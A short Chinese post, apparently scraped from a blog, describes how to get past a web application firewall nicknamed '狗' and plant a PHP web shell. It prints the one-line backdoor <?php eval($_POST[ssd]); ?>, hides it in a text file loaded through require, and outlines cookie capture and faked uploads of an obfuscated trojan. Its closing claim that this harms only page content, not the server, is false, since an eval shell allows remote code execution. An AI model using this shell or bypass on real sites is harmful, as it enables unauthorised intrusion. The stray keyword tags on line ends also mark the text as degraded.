无心间在网上看到一遍文章说是能够绕过狗的,具体以下 php
1.生成一个txt或者其余可读文本,而后将其包含在所运行的程序中,如 服务器
<?php eval($_POST[ssd]); ?> 命名为 1.txt 这时候 狗是不会太多的检测的,通常能够正常放入进去。 cookie
而后在相应的访问页面进行 require 便可运行当前的文件为木马文件。 测试
2.老方法新用途,准备网站进行cookie抓包,而后进行混淆小马,达到能够上传的时候进行欺骗上传,若是网站的过滤不严格的话仍是能够正常上传的。 网站
以上方法只在本地测试,在安装狗的服务器上进行测试过,前提是 我已经有了口令。 这些东西只是能够修改或者删除网页上的东西,不会对服务器早上什么危害。 ui